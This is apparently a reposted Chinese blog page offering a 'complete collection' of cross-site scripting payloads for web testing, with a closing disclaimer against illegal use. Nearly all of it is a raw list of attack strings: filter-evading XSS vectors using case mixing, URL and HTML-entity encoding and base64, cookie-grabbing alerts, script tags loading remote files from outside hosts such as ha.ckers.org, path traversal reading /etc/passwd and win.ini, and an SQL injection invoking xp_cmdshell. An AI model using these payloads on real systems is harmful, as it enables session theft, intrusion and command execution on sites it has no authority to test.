zoukankan      html  css  js  c++  java
  • XSS(跨站脚本攻击)

    XSS(跨站脚本攻击) - 常用代码大全

    1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>
     
    <svg/οnlοad=alert(1)>
     
    <script>alert(document.cookie)</script>
     
    '><script>alert(document.cookie)</script>
     
    ='><script>alert(document.cookie)</script>
     
    <script>alert(vulnerable)</script>
     
    %3Cscript%3Ealert('XSS')%3C/script%3E
     
    <script>alert('XSS')</script>
     
    <img src="javascript:alert('XSS')">
     
    %0a%0a<script>alert("Vulnerable")</script>.jsp
     
    %22%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
     
    %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
     
    %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
     
    %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
     
    <script>alert('Vulnerable');</script>
     
    <script>alert('Vulnerable')</script>
     
    a.jsp/<script>alert('Vulnerable')</script>
     
    a?<script>alert('Vulnerable')</script>
     
    "><script>alert('Vulnerable')</script>
     
    ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&&
     
    %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    %3Cscript%3Ealert(document. domain);%3C/script%3E&
     
    %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
     
    <IMG src="javascript:alert('XSS');">
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=JaVaScRiPt:alert('XSS')>
     
    <IMG src=JaVaScRiPt:alert("XSS")>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src=javascript:alert('XSS')>
     
    <IMG src="jav ascript:alert('XSS');">
     
    <IMG src="jav ascript:alert('XSS');">
     
    <IMG src="jav ascript:alert('XSS');">
     
    "<IMG src=javascript:alert("XSS")>";' > out
     
    <IMG src=" javascript:alert('XSS');">
     
    <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
     
    <BODY BACKGROUND="javascript:alert('XSS')">
     
    <BODY ONLOAD=alert('XSS')>
     
    <IMG DYNSRC="javascript:alert('XSS')">
     
    <IMG LOWSRC="javascript:alert('XSS')">
     
    <BGSOUND src="javascript:alert('XSS');">
     
    <br size="&{alert('XSS')}">
     
    <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
     
    <LINK REL="stylesheet" href="javascript:alert('XSS');">
     
    <IMG src='vbscript:msgbox("XSS")'>
     
    <IMG src="mocha:[code]">
     
    <IMG src="livescript:[code]">
     
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
     
    <IFRAME src=javascript:alert('XSS')></IFRAME>
     
    <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
     
    <TABLE BACKGROUND="javascript:alert('XSS')">
     
    <DIV STYLE="background-image: url(javascript:alert('XSS'))">
     
    <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
     
    <DIV STYLE=" expression(alert('XSS'));">
     
    <STYLE>@import'javasc
    ipt:alert("XSS")';</STYLE>
     
    <IMG STYLE='xss:expression(alert("XSS"))'>
     
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
     
    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
     
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
    <BASE href="javascript:alert('XSS');//">
     
    getURL("javascript:alert('XSS')")
     
    a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
     
    <XML src="javascript:alert('XSS');">
     
    "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
     
    <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
     
    <IMG src="javascript:alert('XSS')"
     
    <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
    '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
     
    <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
     
    <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
    <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
    <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
    <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
    <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
    <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
     
    <IMG SRC=javascript:alert(‘XSS’)>
     
    <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”>
     
    <IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img>
     
    <img src=x οnerrοr=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″>
     
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
     
    &#39;&#88;&#83;&#83;&#39;&#41;>
     
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
     
    <IMG SRC=”jav ascript:alert(‘XSS’);”>
     
    <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
     
    <IMG SRC=” &#14;  javascript:alert(‘XSS’);”>
     
    <<SCRIPT>alert(“XSS”);//<</SCRIPT>
     
    <IMG SRC=”javascript:alert(‘XSS’)”
     
    </script><script>alert(‘XSS’);</script>
     
    <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
     
    <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
     
    <svg/οnlοad=alert('XSS')>
     
    <IMG SRC=’vbscript:msgbox(“XSS”)’>
     
    <BGSOUND SRC="javascript:alert('XSS');">
     
    <BR SIZE="&{alert('XSS')}">
     
    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
     
    <STYLE>@import'javasc
    ipt:alert("XSS")';</STYLE>
     
    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
     
    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
     
    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
    <XSS STYLE="behavior: url(xss.htc);">
     
    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
     
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
     
    <TABLE><TD BACKGROUND="javascript:alert('XSS')">
     
    <DIV STYLE=" expression(alert('XSS'));">
     
    <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
     
    <script>alert(/xss/)</script>
     
    <svg οnlοad=alert(document.domain)>
     
    <img src=document.domain οnerrοr=alert(document.domain)>
     
    <M οnmοuseοver=alert(document.domain)>M
     
    <marquee οnscrοll=alert(document.domain)>
     
    <a href=javascript:alert(document.domain)>M</a>
     
    <body οnlοad=alert(document.domain)>
     
    <details open οntοggle=alert(document.domain)>
     
    <embed src=javascript:alert(document.domain)>
     
    <script>alert(1)</script>
     
    <sCrIpT>alert(1)</sCrIpT>
     
    <ScRiPt>alert(1)</ScRiPt>
     
    <sCrIpT>alert(1)</ScRiPt>
     
    <ScRiPt>alert(1)</sCrIpT>
     
    <img src=1 οnerrοr=alert(1)>
     
    <iMg src=1 oNeRrOr=alert(1)>
     
    <ImG src=1 OnErRoR=alert(1)>
     
    <img src=1 οnerrοr="alert(&quot;M&quot;)">
     
    <marquee οnscrοll=alert(1)>
     
    <mArQuEe OnScRoLl=alert(1)>
     
    <MaRqUeE oNsCrOlL=alert(1)>
     
    <a href=javascript:/0/,alert(%22M%22)>M</a>
     
    <a href=javascript:/00/,alert(%22M%22)>M</a>
     
    <a href=javascript:/000/,alert(%22M%22)>M</a>
     
    <a href=javascript:/M/,alert(%22M%22)>M</a>
     
    <base href=javascript:/M/><a href=,alert(1)>M</a>
     
    <base href=javascript:/M/><iframe src=,alert(1)></iframe>
     
    </textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>
     
    "><img src=x οnerrοr=alert(document.cookie)>.gif
     
    <div style="background-image:url(javascript:alert(/xss/))">
     
    <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
     
    <iframe src=javascript:alert(1)></iframe>
     
    <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
     
    <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
     
    <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
     
    <iframe src=https://baidu.com width=1366 height=768></iframe>
     
    <iframe src=javascript:alert(1) width=1366 height=768></iframe
     
    <form action=javascript:alert(1)><input type=submit>
     
    <form><button formaction=javascript:alert(1)>M
     
    <form><input formaction=javascript:alert(1) type=submit value=M>
     
    <form><input formaction=javascript:alert(1) type=image value=M>
     
    <form><input formaction=javascript:alert(1) type=image src=1>
     
    <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
    

    转载

    https://blog.csdn.net/chk218/article/details/81878479

    声明

    严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

  • 相关阅读:
    mysql主从之slave-skip-errors和sql_slave_skip_counter
    mysql can't create threads in threadpool
    mysql binlog_row_image的选择
    MySQL5.7 error log时间显示问题
    Informatica 常用组件Expression之二 创建EXP组件
    Informatica 常用组件Expression之一 概述
    Informatica 常用组件Source Qualifier之九 创建SQ转换
    Informatica 常用组件Source Qualifier之八 会话前和会话后 SQL
    Informatica 常用组件Source Qualifier之八 Distinct
    Informatica 常用组件Source Qualifier之七 使用排序端口
  • 原文地址:https://www.cnblogs.com/renhaoblog/p/12888130.html
Copyright © 2011-2022 走看看